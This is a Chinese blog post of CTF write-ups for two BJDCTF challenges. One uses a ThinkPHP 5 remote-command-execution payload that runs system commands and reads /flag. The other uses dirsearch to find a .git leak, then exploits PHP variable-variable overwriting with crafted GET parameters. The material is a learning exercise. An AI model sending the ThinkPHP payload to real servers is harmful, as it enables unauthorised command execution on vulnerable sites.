被监督写博客-Day8

。。。。。。。
题目一:
[BJDCTF 2nd]old-hack
提示是thinkphp5的漏洞(远程命令执行漏洞)
?s=1,查看报错信息,
在这里插入图片描述
知道是和这个版本的漏洞有关

漏洞利用:

_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /

在这里插入图片描述
cat /flag
在这里插入图片描述

题目二:
[BJDCTF2020]Mark loves cat

用dirsearch扫描发现.git泄露
(注意调低线程:dirsearch.py -u url -e * --timeout=2 -t 1 -x 400,403,404,500,503,429)

<?php
$flag = file_get_contents('/flag');

<?php

include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
    $$x = $y;
}

foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}



echo "the flag is: ".$flag;

分析代码:
第一个foreach,如果post一个flag=abc,那么变量覆盖后是$flag=abc,最后输出的就会是abc;第二个foreach,如果get一个flag=abc,那么变量覆盖后$flag=$abc,最后输出的为空,因为$abc没有被定义
题目主要涉及的就是变量覆盖,可以用flag将exit要输出的变量覆盖,改成输出flag
payload1:

?yds=flag

在这里插入图片描述
payload2:
先是让is=flag,再满足if后面的判断条件

?is=flag&flag=flag
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值